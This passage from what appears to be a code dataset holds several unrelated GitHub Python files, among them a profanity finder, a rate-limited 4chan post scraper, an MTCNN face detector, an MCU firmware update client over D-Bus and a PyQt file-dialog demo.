self.erase_in_file(root+'/'+name, postfix=postfix, bad_words=bad_words)\n audit_log['processed'].append(self.__get_path(root, dirs, name))\n return audit_log\n\n \n def find_shit(self, root='./', bad_words=['fuck', 'shit'], include_content=True):\n '''\n root: the directory root where you want the crawl to start\n bad_words: list of words you want to search for.\n These can also be regular expressions. It will\n match partials, so 'fuck' will match 'fucking',\n 'unfuckingbelievable', etc. Use \\b and similar\n to constrain to word boundaries.\n \n The meat and potatoes, this is what conducts the walk\n and writes the resultant dataframe to self.df.\n \n To export the df to a csv, use the write_df() method.\n ''' \n for item in os.walk(root):\n \n # keep records for each directory parsed\n file_df = []\n line_no_df = []\n badword_df = []\n if include_content:\n content_df = []\n \n for file in item[2]:\n print('Searching {}'.format(item[0]+'/'+file))\n try:\n openfile = open(item[0] + '/' + file, \"r\").readlines()\n for line_no, content in enumerate(openfile):\n if len(re.findall(self.__makeRegex__(bad_words), content)) > 0:\n for i, badword in enumerate(re.findall(self.__makeRegex__(bad_words), content)):\n file_df.append(item[0]+'/'+file)\n line_no_df.append(line_no)\n badword_df.append(re.findall(self.__makeRegex__(bad_words),content)[i])\n # rstrip to remove newline character\n if include_content:\n content_df.append(content.rstrip())\n except:\n pass\n \n# print(content_df)\n\n # write the records to the dataframe with each dir parsed\n if include_content:\n self.df = self.df.append(pd.DataFrame({'file': file_df, \n 'line_no': line_no_df, \n 'badword': badword_df,\n 'content': content_df},\n columns=['file', 'line_no', 'badword', 'content']),\n ignore_index=True)\n else:\n self.df = self.df.append(pd.DataFrame({'file': file_df, \n 'line_no': line_no_df, \n 'badword': badword_df},\n columns=['file', 'line_no', 'badword']),\n ignore_index=True)\n \n # change the silly auto-detected float line_no to an integer\n self.df['line_no'] = self.df.copy()['line_no'].apply(lambda x: int(x))\n # return self.df\n print(\"Dataframe successfully created, \\n \\\n use .df to print the df, or \\n \\\n .write_df() method to write to file.\")\n\n\n def __get_path(self, root, dirs, name):\n '''\n returns the full path as a string\n '''\n dir_string = ''\n num_dirs = len(dirs)\n \n if num_dirs == 0:\n return(root+'/'+name)\n else:\n for idx, dir in enumerate(dirs):\n if idx < num_dirs:\n dir_string += dir + '/'\n else:\n dir_string += dir\n return(root+dir_string+name)\n\n","repo_name":"ggodreau/profanityParser","sub_path":"pparser.py","file_name":"pparser.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2714582144","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport requests\nimport records\nfrom time import time, sleep\nimport re\nimport html\nfrom tqdm import tqdm\n\nBOARD_LIST = ['b', 'lgbt', 'pol', 'r9k', 'bant', 'i', 'a']\n\nLAST_TIME = 0.0\n\nAUTH_SECRET = \"./auth.secret\" #content: user:password@hostname[\\n]\nDB_SIZE_SQL = \"./db_size.sql\"\n\n# Do not make more than one request per second.\ndef wait_get(url):\n global LAST_TIME\n while time() - LAST_TIME <= 1.0:\n sleep(0.1) # This is what the API wants, not me..!\n r = requests.get(url)\n LAST_TIME = time()\n return r\n\n# make clear text from 4chan posts\ndef clear_post(comment):\n comment = re.sub(r'>>\\d+<\\/a>(
)*', '', comment)\n comment = re.sub(r'
', '\\n', comment)\n comment = re.sub(r'.*?<\\/span>', '', comment)\n comment = re.sub(r'<.*?>', '', comment)\n comment = re.sub(r'^>', '', comment, flags=re.MULTILINE)\n comment = re.sub(r'^>\\d+', '', comment, flags=re.MULTILINE)\n comment = html.unescape(comment)\n comment = re.sub(r'http\\S+', '', comment)\n return '\\n'.join([x for x in comment.split(\"\\n\") if x != ''])\n\nif __name__ == '__main__':\n\n it_count = 0\n er_count = 0\n start_time = time()\n while True:\n\n try:\n it_count += 1\n running_time = (time() - start_time) / 3600\n print(\"\\033[31m[ITERATION {}]\\033[37m Running for {:.2f}h with {} errors. [{:.2f} IT/s]\".format(it_count, running_time, er_count, running_time / it_count))\n\n # login database\n db = records.Database(\"postgresql://{}/cancer-corpus\".format(open(AUTH_SECRET, \"r\").read().split()[0]))\n\n # iterate over all interesting boards\n for board_name in BOARD_LIST:\n r = wait_get(\"https://a.4cdn.org/{}/threads.json\".format(board_name))\n board = r.json()\n relsize = db.query_file(DB_SIZE_SQL)[0][\"total\"]\n postcnt = db.query(\"select count(*) as count from fourchan\")[0][\"count\"]\n print(\"\\033[36m[CRAWLING /{}/]\\033[37m database_size:{}; post_count:{}\".format(board_name, relsize, postcnt))\n\n # iterate over all pages (11) in the board\n for page in board:\n print(\"Crawling 4chan.org/{}/{}\".format(board_name, page[\"page\"]))\n post_counter = 0\n\n # iterate over all threads (15) on the page\n for thread in tqdm(page[\"threads\"]):\n r = wait_get(\"https://a.4cdn.org/{}/thread/{}.json\".format(board_name, thread[\"no\"]))\n try: # this sometimes raises strange JSON errors\n thread = r.json()\n except:\n continue\n\n # iterate over all posts (>= 1) in the thread\n for post in thread[\"posts\"]:\n if \"com\" in post and \"no\" in post:\n\n # test if post already existing\n r = db.query(\"SELECT count(1) AS out FROM fourchan WHERE post_id = :id\", id=post['no'])\n if r[0][\"out\"] != 0: continue\n\n # process comment\n comment = clear_post(post[\"com\"])\n if comment == \"\": continue\n post_counter += 1\n\n # insert comment into database\n db.query(\"INSERT INTO fourchan\\\n VALUES (:id, :com)\",\n id=post[\"no\"], com=comment)\n print(\" - Added {} new posts!\".format(post_counter))\n\n except KeyboardInterrupt as e:\n # terminate on Ctrl+C\n raise e\n except:\n # shift BOARD_LIST to begin with next board, not from beginning\n ind = BOARD_LIST.index(board_name) + 1\n BOARD_LIST = BOARD_LIST[ind:] + BOARD_LIST[:ind]\n er_count += 1\n print(\"\\033[31m[ITERATION {}]\\033[37m An error occured. New BOARD_LIST: {}\".format(it_count, BOARD_LIST))\n continue\n","repo_name":"SinForest/cancer-bot","sub_path":"crawl_4chan.py","file_name":"crawl_4chan.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12571230","text":"from eduea import EA , EAOpts , Binary\nimport random\n\n# random.seed(5641984138)\n\n# f(x) = a3*x^3 + a2*x^2 + a1*x + a0\na3 = 1\na2 = 2\na1 = 0\na0 = 10\n\n# x1 <= x <= x2\nx1 = 0.0\nx2 = 15.0\n\nN = 20\n\n\nmx = (1 << N ) - 1\n\nk1 = ( x2 - x1 ) / mx\nk2 = x1\n\ndef decode(genotype):\n v , s = 1 , 0\n for i in genotype:\n s = s + v * i\n v = v * 2\n phenotype = k1 * s + k2\n return phenotype\n\n# im wiekszy \"fitness\" tym lepszy osobnik !!!\ndef fitness(phenotype) :\n x = phenotype\n y = a3*x**3 + a2*x**2 + a1*x + a0\n return y\n\n\n\nwyniki = []\n\ndef strPhenotype(pehontype):\n return pehontype\n\ndef strGenotype(genotype):\n return genotype\n\n\nfor population in [i for i in range(10,150)]:\n solutions = []\n for proby in range(10):\n try:\n # Ustawienia solvera \n options = EAOpts()\n options.random_individual = Binary.random(N)\n options.decode = decode\n options.fitness = fitness\n options.pop_size = population\n options.crossover = Binary.onePointCrossover\n options.mutation = Binary.mutation\n options.stop_generations = 20\n # options.details = \"individuals\"\n # options.str_phenotype = strPhenotype\n # options.str_genotype = strGenotype\n # options.serialize = strGenotype\n\n # rozwiązywanie\n solution = EA(options)\n\n # wyświetlenie wyniku\n print ( \" The best solution found is = %5.30f \" % solution.best_solution.value )\n print ( \" for x = %5.30f \" % solution.best_solution.phenotype )\n\n solutions.append(solution)\n\n except:\n pass\n solutions1 = [s.best_solution.phenotype for s in solutions]\n best = None\n if len(solutions1):\n best = sum(solutions1)/len(solutions1)\n wyniki.append( {\"Population\": population, \"Best\": best, \"Solutions\": solutions1} )\n\nprint(wyniki)\n\nimport csv\nwith open('kwadratowa.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter='\\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow([\"Population\", \"Best\"])\n \n def localize_floats(row):\n return [\n str(el).replace('.', ',') if isinstance(el, float) else el \n for el in row\n ]\n\n for wynik in wyniki:\n spamwriter.writerow(localize_floats([wynik[\"Population\"], wynik[\"Best\"]]))\n","repo_name":"DawiX123PL/POLSL2_MO","sub_path":"Lab3/src/kwadratowa2.py","file_name":"kwadratowa2.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34145887226","text":"class Validation:\n def validate(self):\n flag=1\n while flag:\n phone_No=str(input(\"Enter the phone Number:\"))\n if(len(phone_No) == 10 and int(phone_No)>6000000000 and int(phone_No)<9999999999):\n break\n else:\n print(\"?????????????InValid phone number??????????????\")\n\n \n\n\n\n\n\n","repo_name":"DEVIDHARSANA19/Python-Application","sub_path":"Documents/Application/Validation.py","file_name":"Validation.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16000575469","text":"source = '''\nfunction injectedTouchEventsFunction() {\n const touchEvents = ['ontouchstart', 'ontouchend', 'ontouchmove', 'ontouchcancel'];\n const recepients = [window.__proto__, document.__proto__];\n for (let i = 0; i < touchEvents.length; ++i) {\n for (let j = 0; j < recepients.length; ++j) {\n if (!(touchEvents[i] in recepients[j])) {\n Object.defineProperty(recepients[j], touchEvents[i], {\n value: null, writable: true, configurable: true, enumerable: true\n });\n }\n }\n }\n }\n'''\n\n\nclass EmulationManager(object):\n\n def __init__(self, client):\n self._client = client\n self._emulating_mobile = False\n self._injected_touch_script_id = None\n\n async def emulate_viewport(self, client, viewport={}):\n viewport = {**{\n 'isMobile': False,\n 'deviceScaleFactor': 1,\n 'isLandscape': True,\n 'hasTouch': False\n }, **viewport}\n if 'isLandscape' in viewport and viewport['isLandscape']:\n screen_orientation = {'angle': 90, 'type': 'landscapePrimary'}\n else:\n screen_orientation = {'angle': 0, 'type': 'portraitPrimary'}\n\n await self._client.send('Emulation.setDeviceMetricsOverride', {\n 'mobile': viewport['isMobile'],\n 'width': viewport['width'],\n 'height': viewport['height'],\n 'deviceScaleFactor': viewport['deviceScaleFactor'],\n 'screenOrientation': screen_orientation\n })\n await self._client.send('Emulation.setTouchEmulationEnabled', {\n 'enabled': viewport['hasTouch'],\n 'configuration': 'mobile' if viewport['isMobile'] else 'desktop'\n })\n\n reload_needed = False\n if viewport['hasTouch'] and not self._injected_touch_script_id:\n _source = '({})()'.format(source)\n res = await self._client.send(\n 'Page.addScriptToEvaluateOnNewDocument', {\n 'source': _source\n }\n )\n self._injected_touch_script_id = res['identifier']\n reload_needed = True\n elif not viewport['hasTouch'] and self._injected_touch_script_id:\n await self._client.send(\n 'Page.removeScriptToEvaluateOnNewDocument', {\n 'identifier': self._injected_touch_script_id\n }\n )\n self._injected_touch_script_id = None\n reload_needed = True\n if self._emulating_mobile != viewport['isMobile']:\n reload_needed = True\n self._emulating_mobile = viewport['isMobile']\n return reload_needed\n","repo_name":"brijeshb42/pyppeteer","sub_path":"pyppeteer/emulation_manager.py","file_name":"emulation_manager.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22698471092","text":"import os\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nVERSION = \"0.0.1\"\n\nsetup( name = \"pingpong\",\n version = VERSION,\n packages = find_packages(exclude=[\"tests\", \"tests.*\"]),\n author = \"Diego Souza\",\n author_email = \"dsouza+pingpong@bitforest.org\",\n description = \"A library for quickly creating line-based interactive programs\",\n keywords = \"interactive line-based protocols\",\n data_files = ( (\"/etc/pingpong\", [ \"pingpong/samples/ping.tac\",\n \"pingpong/samples/hpflex10.tac\"\n ]\n ),\n ),\n install_requires = [ \"twisted >= 11.0.0\",\n \"pycrypto >= 2.2\"\n ]\n )\n","repo_name":"dgvncsz0f/pingpong","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34512840888","text":"import mtcnn_detect_face\nimport tensorflow as tf\nfrom keras import backend as K\nimport numpy as np\nimport cv2\nimport os\n\nclass MTCNNFaceDetector():\n \"\"\"\n This class load the MTCNN network and perform face detection.\n \n Attributes:\n model_path: path to the MTCNN weights files\n \"\"\"\n def __init__(self, sess, model_path=\"./mtcnn_weights/\"):\n self.pnet = None\n self.rnet = None\n self.onet = None\n self.create_mtcnn(sess, model_path)\n \n def create_mtcnn(self, sess, model_path):\n if not model_path:\n model_path, _ = os.path.split(os.path.realpath(__file__))\n\n with tf.variable_scope('pnet'):\n data = tf.placeholder(tf.float32, (None,None,None,3), 'input')\n pnet = mtcnn_detect_face.PNet({'data':data})\n pnet.load(os.path.join(model_path, 'det1.npy'), sess)\n with tf.variable_scope('rnet'):\n data = tf.placeholder(tf.float32, (None,24,24,3), 'input')\n rnet = mtcnn_detect_face.RNet({'data':data})\n rnet.load(os.path.join(model_path, 'det2.npy'), sess)\n with tf.variable_scope('onet'):\n data = tf.placeholder(tf.float32, (None,48,48,3), 'input')\n onet = mtcnn_detect_face.ONet({'data':data})\n onet.load(os.path.join(model_path, 'det3.npy'), sess)\n self.pnet = K.function([pnet.layers['data']], [pnet.layers['conv4-2'], pnet.layers['prob1']])\n self.rnet = K.function([rnet.layers['data']], [rnet.layers['conv5-2'], rnet.layers['prob1']])\n self.onet = K.function([onet.layers['data']], [onet.layers['conv6-2'], onet.layers['conv6-3'], onet.layers['prob1']])\n \n def detect_face(self, image, minsize=20, threshold=0.7, factor=0.709, use_auto_downscaling=True, min_face_area=25*25):\n if use_auto_downscaling:\n image, scale_factor = self.auto_downscale(image)\n \n faces, pnts = mtcnn_detect_face.detect_face(\n image, minsize, \n self.pnet, self.rnet, self.onet, \n [0.6, 0.7, threshold], \n factor)\n faces = self.process_mtcnn_bbox(faces, image.shape)\n faces, pnts = self.remove_small_faces(faces, pnts, min_face_area)\n \n if use_auto_downscaling:\n faces = self.calibrate_coord(faces, scale_factor)\n pnts = self.calibrate_landmarks(pnts, scale_factor)\n return faces, pnts\n \n def auto_downscale(self, image):\n if self.is_higher_than_1080p(image):\n scale_factor = 4\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n elif self.is_higher_than_720p(image):\n scale_factor = 3\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n elif self.is_higher_than_480p(image):\n scale_factor = 2\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n else:\n scale_factor = 1\n resized_image = image.copy()\n return resized_image, scale_factor\n \n @staticmethod\n def is_higher_than_480p(x):\n return (x.shape[0] * x.shape[1]) >= (858*480)\n\n @staticmethod\n def is_higher_than_720p(x):\n return (x.shape[0] * x.shape[1]) >= (1280*720)\n\n @staticmethod\n def is_higher_than_1080p(x):\n return (x.shape[0] * x.shape[1]) >= (1920*1080)\n\n @staticmethod\n def process_mtcnn_bbox(bboxes, im_shape):\n # output bbox coordinate of MTCNN is (y0, x0, y1, x1)\n # Here we process the bbox coord. to a square bbox with ordering (x0, y1, x1, y0)\n for i, bbox in enumerate(bboxes):\n y0, x0, y1, x1 = bboxes[i,0:4]\n w = int(y1 - y0)\n h = int(x1 - x0)\n length = (w + h)/2\n center = (int((x1+x0)/2),int((y1+y0)/2))\n new_x0 = np.max([0, (center[0]-length//2)])#.astype(np.int32)\n new_x1 = np.min([im_shape[0], (center[0]+length//2)])#.astype(np.int32)\n new_y0 = np.max([0, (center[1]-length//2)])#.astype(np.int32)\n new_y1 = np.min([im_shape[1], (center[1]+length//2)])#.astype(np.int32)\n bboxes[i,0:4] = new_x0, new_y1, new_x1, new_y0\n return bboxes\n \n @staticmethod\n def calibrate_coord(faces, scale_factor):\n for i, (x0, y1, x1, y0, _) in enumerate(faces):\n faces[i] = (x0*scale_factor, y1*scale_factor, \n x1*scale_factor, y0*scale_factor, _)\n return faces\n\n @staticmethod\n def calibrate_landmarks(pnts, scale_factor):\n # pnts is a numpy array\n return np.array([xy * scale_factor for xy in pnts])\n \n @staticmethod\n def remove_small_faces(faces, pnts, min_area=25*25):\n def compute_area(face_coord):\n x0, y1, x1, y0, _ = face_coord\n area = np.abs((x1 - x0) * (y1 - y0))\n return area\n \n new_faces = []\n new_pnts = []\n # faces has shape (num_faces, coord), and pnts has shape (coord, num_faces)\n for face,pnt in zip(faces, pnts.transpose()):\n if compute_area(face) >= min_area:\n new_faces.append(face)\n new_pnts.append(pnt)\n new_faces = np.array(new_faces)\n new_pnts = np.array(new_pnts).transpose()\n return new_faces, new_pnts","repo_name":"shaoanlu/faceswap-GAN","sub_path":"detector/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":5655,"program_lang":"python","lang":"en","doc_type":"code","stars":3303,"dataset":"github-code","pt":"40"} +{"seq_id":"35845865011","text":"from concurrent.futures import ThreadPoolExecutor\nimport subprocess\n\n\n_dispatcher = None\n\n\ndef get_verifier_dispatcher():\n global _dispatcher\n if _dispatcher is None:\n _dispatcher = VerifierDispatcher()\n return _dispatcher\n\n\nclass VerifierDispatcher:\n\n def __init__(self):\n self._pool = ThreadPoolExecutor(max_workers=1)\n self._jar_path = r\".\\Coral-2.0.jar\"\n\n def run(self, filepath, handle):\n self._pool.submit(self._run, filepath, handle)\n\n def _run(self, filepath, handle):\n process = subprocess.Popen(\n [\"java\", \"-jar\", self._jar_path, \"GreenStart\", \"1\", \"--auto_parse_network\", filepath],\n stdout=subprocess.PIPE, bufsize=10, universal_newlines=True\n )\n while True:\n buf = process.stdout.readline()\n if not buf :\n if process.poll() is not None:\n break\n continue\n handle({\"type\": \"result\", \"data\": buf.strip()})\n handle({\"type\": \"finish\"})\n","repo_name":"Mauue/DDPVScripts","sub_path":"server/dispatcher/VerifierDispatcher.py","file_name":"VerifierDispatcher.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10926506475","text":"#!/usr/bin/python\r\n\"\"\"\r\n MCU update tool, it attaches to Probe daemon via D-Bus, and send update commands to probe daemo\r\n It will write the process information to /tmp/update_info\r\n\"\"\"\r\nimport sys\r\nimport os\r\nimport time\r\nimport dbus\r\nfrom traceback import print_exc\r\nfrom argparse import ArgumentParser\r\nimport json\r\n\r\n\r\n\r\ndef is_json(myjson):\r\n try:\r\n json_object = json.loads(myjson)\r\n except ValueError:\r\n return False\r\n return True\r\n\r\n\r\nclass ProbeDBus(object):\r\n\r\n def __init__(self, dbus_tcp):\r\n super(ProbeDBus, self).__init__()\r\n self.probe_general = None\r\n self.probe_measure = None\r\n self.bus = self.attach_probe(dbus_tcp)\r\n\r\n def is_alive(self):\r\n return False if self.bus is None else True\r\n\r\n def attach_probe(self, dbus_tcp=None):\r\n try:\r\n if dbus_tcp is not None:\r\n bus = dbus.bus.BusConnection(\"tcp:host=\"+dbus_tcp+\",port=55556\")\r\n else:\r\n bus = dbus.SystemBus() \r\n bus_obj = bus.get_object(\"h2o.probe.service\", \"/ProbeObject\")\r\n self.probe_general = dbus.Interface(bus_obj, \"h2o.probe.service.general\")\r\n self.probe_measure = dbus.Interface(bus_obj, \"h2o.probe.service.measure\")\r\n return bus\r\n except dbus.DBusException:\r\n print_exc()\r\n return None\r\n\r\n def dbus_json(self, json_cmd):\r\n result = self.probe_measure.Json(json_cmd)\r\n result = json.loads(result)\r\n # result = json.dumps(result, sort_keys=True, indent=4, separators=(',', ': '))\r\n return result\r\n\r\nclass ProbeCommand(object):\r\n \r\n def __init__(self, protocol):\r\n pass\r\n\r\n def execute(self, cmd):\r\n pass\r\n\r\n\r\nclass UpdateClient(ProbeCommand):\r\n\r\n info_path = '/tmp/update_info'\r\n error_path = '/tmp/update_error'\r\n\r\n ''' Resolve command from single command, command json list, or event command BASIC script. '''\r\n def __init__(self, dbus_tcp):\r\n try :\r\n self.probe = ProbeDBus(dbus_tcp)\r\n except:\r\n print_exc()\r\n self.write_err(\"Can not connect to dbus service\")\r\n\r\n\r\n def write_err(self, err):\r\n err_msg = json.dumps(err, sort_keys=True, indent=4, separators=(',', ': '))\r\n print(err_msg)\r\n with open(self.error_path, 'w') as err_file:\r\n err_file.write(err_msg)\r\n\r\n def write_info(self, info):\r\n with open(self.info_path, 'w') as info_file:\r\n info_file.write(info)\r\n\r\n def write_stdout(self, info):\r\n sys.stdout.write(\"\\rUpdate mcu in processing: \" + info + \"%\")\r\n sys.stdout.flush()\r\n\r\n def send_udpate(self, file):\r\n json_cmd = '{\"op\": \"flash\", \"param\": {\"hex\": \"' + file + '\"}}'\r\n result = self.probe.dbus_json(json_cmd)\r\n if result['ack'] != 0:\r\n self.write_err(result)\r\n return False\r\n return True\r\n\r\n def query_update(self):\r\n json_cmd = '{ \"op\": \"flash_progress\", \"param\": {} }'\r\n for i in range(1, 180):\r\n time.sleep(1)\r\n result = self.probe.dbus_json(json_cmd)\r\n if result['ack'] != 0:\r\n self.write_err(result)\r\n return False\r\n process = float(result['result']) * 100\r\n self.write_stdout(str(int(process)))\r\n self.write_info(str(int(process)))\r\n\r\n if(process == 100):\r\n print('\\rUpdate finished! ')\r\n break\r\n return True\r\n\r\n def init_update(self):\r\n if os.access(self.error_path, os.F_OK):\r\n os.remove(self.error_path)\r\n self.write_info('0')\r\n\r\n def update(self, file):\r\n self.init_update()\r\n if False == self.send_udpate(file):\r\n return False\r\n if False == self.query_update():\r\n return False\r\n return True\r\n\r\n def execute(self, file):\r\n try :\r\n return self.update(file)\r\n except:\r\n print_exc()\r\n self.write_err(\"Exception happened in update muc\")\r\n return False\r\n\r\n\r\ndef parse_args():\r\n parser = ArgumentParser(description='Communicate with Probe to update firmware.')\r\n parser.add_argument('--tcp', dest='dbus_tcp',\r\n help='Attach to remote D-Bus Probe daemon (e.g.: 10.131.133.25)',\r\n default=None, type=str)\r\n parser.add_argument('--firmware', dest='firmware_file',\r\n help='Pointer to the mcu firmware binary file path',\r\n default='/tmp/mcu/firmware.bin', type=str)\r\n args = parser.parse_args()\r\n return args\r\n \r\n\r\ndef main():\r\n args = parse_args()\r\n client = UpdateClient(args.dbus_tcp)\r\n return client.execute(args.firmware_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"HachCompany-C4C/meta-rainbow","sub_path":"recipes-common/swupdate-pkg/files/update_mcu.py","file_name":"update_mcu.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13183255232","text":"\"\"\"Contains the main textractor class.\"\"\"\n\nfrom taxonomy_extractor.core import CodeTable\nfrom taxonomy_extractor.vectorspace import word2vec\nfrom taxonomy_extractor.util import io\nfrom taxonomy_extractor.util import logger\n\nlogger = logger.init_logger()\n\n\nclass Textractor(object):\n\n \"\"\"\n Textractor class.\n\n - Reads in input code tables\n - traing vector space model\n - use model + string similarity to fill in new tables\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize a textractor instance.\n \"\"\"\n self.input_tables = []\n self.output_table = None\n self.total_phrases = []\n self.vector_space_model = None\n\n def run(self, parsed_config):\n \"\"\"\n Run the textractor module.\n\n params:\n parsed_config (dict)\n \"\"\"\n logger.debug('Starting Textractor with args %s' % parsed_config)\n\n self.read_input_tables(parsed_config['default']['filled_taxonomies'])\n self.train_vector_space(\n parsed_config['word2vec'],\n parsed_config['default']['vector_space_output'])\n self.read_output_table(parsed_config['default']['empty_taxonomies'])\n self.fill_output_tables(parsed_config['default']['vector_threshold'])\n self.write_output_tables(parsed_config['default']['output_taxonomies'])\n\n def read_input_tables(self, input_tables_paths):\n \"\"\"\n Read in input tables.\n\n params:\n input_tables_paths (list[str])\n \"\"\"\n logger.info('Reading in input tables %s' % input_tables_paths)\n for path in input_tables_paths:\n self.input_tables.append(self._read_table(path))\n\n def read_output_table(self, output_table_path):\n \"\"\"\n Read in output table.\n\n params:\n output_table_path (str)\n \"\"\"\n logger.info('Reading in output table to be filled %s' %\n output_table_path)\n self.output_table = self._read_table(output_table_path)\n\n def write_output_tables(self, output_table_path):\n \"\"\"\n Write filled tables to the output path.\n\n params:\n output_table_path (str)\n \"\"\"\n logger.info('Writing output table to %s' % output_table_path)\n self._write_table(\n self.output_table.taxonomies_to_str(), output_table_path)\n\n def _read_table(self, path):\n \"\"\"\n Read in a single table.\n\n - Parse taxonomies\n - Create a CodeTable instance\n - Assign taxonomies to the new CodeTable\n\n params:\n path (str)\n \"\"\"\n parsed_taxonomies = io.read(path)\n table = CodeTable()\n table.read(parsed_taxonomies)\n return table\n\n def _write_table(self, table, path):\n \"\"\"\n Write CodeTable to the given path.\n\n params:\n table (CodeTable)\n path (str)\n \"\"\"\n io.write(table, path)\n\n def train_vector_space(self, train_params, output_path):\n \"\"\"\n Train vector space model.\n\n params:\n train_params (dict)\n \"\"\"\n if io.exists(output_path):\n logger.debug('Vector space already exists, loading %s' %\n output_path)\n self.vector_space_model = io.read(output_path)\n else:\n logger.info('Training vector space using word2vec')\n self._collect_phrases()\n phrases_as_tokens = self._phrases_to_tokens()\n self._start_word2vec(phrases_as_tokens, train_params)\n self._assign_vectors_to_phrases()\n logger.debug('Writing vector space to %s' %\n output_path)\n\n io.write(self.vector_space_model, output_path)\n\n def _start_word2vec(self, phrases_as_tokens, train_params):\n \"\"\"\n Start word2vec training.\n\n Phrases as tokens represent each taxonomy as series of tokens.\n Example:\n + Software Engineer\n - Software Developer\n - Backend Developer\n\n will be represented as: [software, engineer, software, developer, ..]\n\n params:\n phrases_as_tokens (list[list[str]])\n train_params (dict)\n \"\"\"\n logger.debug('Starting word2vec')\n self.vector_space_model = word2vec.Word2Vec()\n self.vector_space_model.train(phrases_as_tokens, train_params)\n\n def _assign_vectors_to_phrases(self):\n \"\"\"\n Assign vectors to phrases after training.\n\n Since training is done on the token level, each phrase will get\n a vector based on its tokens' vectors, by taking their average\n \"\"\"\n logger.debug(\n 'Converting vector space model from token level to phrase level')\n\n self.vector_space_model.create_phrase_model(self.total_phrases)\n\n def fill_output_tables(self, vector_threshold):\n \"\"\"\n Fill output tables with new phrases.\n \"\"\"\n logger.info('Filling output tables')\n\n phrases_dict = self._phrases_to_dict()\n\n logger.debug('Assigning early attractors using string similarity')\n self.output_table.assign_early_attractors(phrases_dict)\n\n logger.debug('Assigning remaining phrases using vector similarity')\n for phrase_obj in phrases_dict.values():\n self.output_table.assign_attractor(phrase_obj,\n self.vector_space_model,\n vector_threshold)\n\n def _collect_phrases(self):\n \"\"\"\n Collect phrases from input tables.\n\n self.total_phrases should then be a huge list of Phrase objects\n \"\"\"\n logger.debug('Collecting phrase from input tables')\n for table in self.input_tables:\n self.total_phrases += table.collect_phrases()\n\n def _phrases_to_tokens(self):\n \"\"\"\n Create a list of tokens representing the phrase list.\n\n returns:\n list[list[str]]\n \"\"\"\n logger.debug('Collecting phrase tokens for training')\n phrases_as_tokens = []\n for phrase in self.total_phrases:\n phrases_as_tokens.append(phrase.tokens)\n\n return phrases_as_tokens\n\n def _phrases_to_dict(self):\n \"\"\"\n Create a dict of phrases str and their object references.\n\n returns:\n dict{str:Phrase}\n \"\"\"\n logger.debug(\n 'Creating dict to fill output table')\n\n phrases_dict = {}\n for phrase in self.total_phrases:\n phrases_dict[phrase.raw_form] = phrase\n\n return phrases_dict\n","repo_name":"tarekmehrez/Taxonomy-Enricher","sub_path":"lib/taxonomy_extractor/main/textractor.py","file_name":"textractor.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15904066405","text":"from PyQt5.Qt import *\r\n\r\nclass Window(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"QFileDialog----静态方法的学习\")\r\n self.resize(500, 500)\r\n self.setup_ui()\r\n\r\n def setup_ui(self):\r\n # 获取一个打开的文件名称,\"./表示当前文件夹\"\r\n # 过滤掉不需要的文件格式,一个过滤器,\".png\",**表示所有文件,想写多个需要用;;分割\r\n #result = QFileDialog.getOpenFileName(self, \"选择一个py文件\", \",/\",\r\n # \"All(*.*);;Images(*.png *.jpg);;Python文件(*.py)\")\r\n # 一个元素,绝对路径和过滤字符串\r\n #print(result)\r\n\r\n # # 同时获取多个文件\r\n # result = QFileDialog.getOpenFileNames(self, \"选择多个文件\",\",/\",\r\n # \"All(*.*);;Images(*.png *.jpg);;Python文件(*.py)\" )\r\n # # 返回一个元组,元组的第一个元素是一个列表,列表中共有所选的多个文件路径,后边就是过滤器\r\n # print(result)\r\n\r\n # result = QFileDialog.getOpenFileUrl(self, \"选择一个文件\", \"./\",\r\n # \"All(*.*);;Images(*.png *.jpg);;python(*.py)\")\r\n # # 元组的第一个元素变成了QUrl对象,本地文件所对应的协议:file//\r\n # print(result)\r\n\r\n # 保存文件\r\n # result = QFileDialog.getSaveFileName(self, \"保存文件\", \"./\", \"All(*.*);;Images(*.png *.jpg);;python文件(*.py)\")\r\n # # 已经获得保存文件的路径,可以直接将所要保存的文件的内容直接写入该文件\r\n # print(result)\r\n\r\n # # 获取文件夹\r\n # result = QFileDialog.getExistingDirectory(self, \"选择一个文件夹\", \"./\")\r\n # # 输出结果就是一个单独的路径字符串,\r\n # print(result)\r\n\r\n # 目录需要是一个QUrl对象才可以\r\n result = QFileDialog.getExistingDirectory(self, \"选择一个文件夹\", QUrl(\"./\"))\r\n print(result)\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = 